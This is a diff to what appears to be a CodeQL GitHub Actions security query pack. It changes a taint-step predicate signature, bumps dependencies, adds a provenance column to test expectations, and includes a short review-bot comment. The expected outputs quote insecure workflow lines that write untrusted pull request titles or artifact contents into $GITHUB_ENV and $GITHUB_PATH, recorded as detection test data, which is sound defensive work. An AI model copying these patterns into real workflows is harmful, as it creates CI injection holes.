@@ -14,12 +14,16 @@ private import codeql.actions.Ast */ predicate defaultTaintSanitizer(DataFlow::Node node) { none() } +// predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { +// any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +// } /** * Holds if the additional step from `nodeFrom` to `nodeTo` should be included * in all global taint flow configurations. */ -predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { - any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +cached +predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo, string model) { + any(AdditionalTaintStep s).step(nodeFrom, nodeTo) and model = "" } /** diff --git a/ql/lib/qlpack.gbo b/ql/lib/qlpack.gbo deleted file mode 100644 index c77f7924c126..000000000000 --- a/ql/lib/qlpack.gbo +++ /dev/null @@ -1,13 +0,0 @@ ---- -warnOnImplicitThis: false -name: seclab/actions-all -version: 0.0.1-dev -groups: actions -extractor: actions -library: true -tests: test -dependencies: - codeql/javascript-all: ^0.8.7 - "codeql/controlflow": "*" - "codeql/dataflow": "*" - "codeql/ssa": "*" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index bf05e80e0a60..48045dbf6792 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,10 +4,10 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.33 dependencies: - codeql/util: ^0.2.0 - codeql/yaml: ^0.1.2 - codeql/controlflow: ^0.1.0 - codeql/dataflow: ^0.1.0 + codeql/util: ^1.0.0 + codeql/yaml: ^1.0.0 + codeql/controlflow: ^1.0.0 + codeql/dataflow: ^1.0.0 dbscheme: yaml.dbscheme extractor: yaml groups: diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 84a6ccba26dc..4b8239b7f6ca 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml 
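Review bot: The commented-out two-argument `defaultAdditionalTaintStep` is left in the file, and it now sits between `defaultTaintSanitizer` and the QLDoc block of the new three-argument predicate, so the doc comment is visually detached from what it documents. The old signature is in history; remove the three `//` lines so the QLDoc sits directly above `cached`. The new `model` parameter is also undocumented; a line such as ` * `model` names the model this step comes from; Actions steps are not model-backed, so it is always the empty string.` in the QLDoc would explain the `model = ""` binding, and the same sentence fits `simpleLocalFlowStep` in DataFlowPrivate.qll above.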
@@ -2,15 +2,15 @@ lockVersion: 1.0.0
 dependencies:
   codeql/controlflow:
-    version: 0.1.8
+    version: 1.0.0
   codeql/dataflow:
-    version: 0.1.8
+    version: 1.0.0
   codeql/ssa:
-    version: 0.2.8
+    version: 1.0.0
   codeql/typetracking:
-    version: 0.2.8
+    version: 1.0.0
   codeql/util:
-    version: 0.2.8
+    version: 1.0.0
   codeql/yaml:
-    version: 0.1.5
+    version: 1.0.0
 compiled: false
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected
index 31e367ac3175..0a5bfe433e91 100644
--- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected
@@ -1,8 +1,8 @@
 edges
-| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet |
-| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet |
-| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value |
-| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] |
+| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | provenance | |
+| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | provenance | |
+| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | provenance | |
+| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | provenance | |
 nodes
 | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet |
 | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] |
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected
index 6540b1910682..87c185fb5e12 100644
--- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected
@@ -1,7 +1,7 @@
 edges
-| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files |
-| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted |
-| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] |
+| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | provenance | |
+| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | provenance | |
+| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | provenance | |
 nodes
 | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted |
 | action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files |
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected
index 063a26bd6ef6..067edb68bb1c 100644
--- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected
@@ -1,7 +1,7 @@
 edges
-| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet |
-| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected |
-| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] |
+| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | provenance | |
+| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | |
+| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | |
 nodes
 | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet |
 | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected |
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected
index a45b9acf416d..f2178960774e 100644
--- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected
+++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected
@@ -1,5 +1,5 @@
 edges
-| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path |
+| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | provenance | |
 nodes
 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path |
 | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path |
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected
index 2cabeaca9faa..c76034f74d46 100644
--- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected
+++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected
@@ -1,7 +1,7 @@
 edges
-| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 |
-| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] |
-| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files |
+| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | provenance | |
+| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | provenance | |
+| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | provenance | |
 nodes
 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | semmle.label | jobs.job1.outputs.job-output2 |
 | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] |
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected
index a6be99e1bd05..8589d82d8259 100644
--- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected
+++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected
@@ -1,9 +1,9 @@
 edges
-| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path |
-| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 |
-| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] |
-| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output |
-| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] |
+| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | |
+| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | |
+| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | provenance | |
+| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | provenance | |
+| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | provenance | |
 nodes
 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path |
 | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 |
diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected
index c6091f1fc239..7fab238795c6 100644
--- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected
@@ -1,10 +1,10 @@
 edges
-| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH |
-| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH |
-| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH |
-| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH |
-| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" |
-| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" |
+| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | |
+| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | |
+| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | |
+| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | |
+| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | |
+| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | |
 nodes
 | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title |
 | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH |
diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected
index d3b90de71e32..ea360bc56df0 100644
--- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected
+++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected
@@ -1,10 +1,10 @@
 edges
-| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH |
-| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH |
-| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH |
-| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH |
-| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" |
-| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" |
+| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | |
+| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | |
+| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | |
+| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | |
+| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | |
+| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | |
 nodes
 | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title |
 | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH |
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
index ffaaf91e5504..0dbff9553183 100644
--- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
@@ -1,16 +1,16 @@
 edges
-| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n |
-| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n |
-| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n |
-| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n |
-| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n |
-| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n |
-| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n |
-| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n |
-| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n |
-| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV |
-| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV |
-| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n |
+| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | |
+| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | |
+| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | |
+| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | |
+| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | |
+| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | |
+| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | |
+| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | |
+| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | |
+| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | |
+| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | |
+| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | |
 nodes
 | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step |
 | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n |
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected
index 28fffe0e5e4d..5641ea53afd2 100644
--- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected
+++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected
@@ -1,16 +1,16 @@
 edges
-| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n |
-| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n |
-| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n |
-| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n |
-| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n |
-| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n |
-| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n |
-| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n |
-| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n |
-| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV |
-| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV |
-| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n |
+| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | |
+| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | |
+| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | |
+| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | |
+| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | |
+| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | |
+| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | |
+| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | |
+| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | |
+| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | |
+| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | |
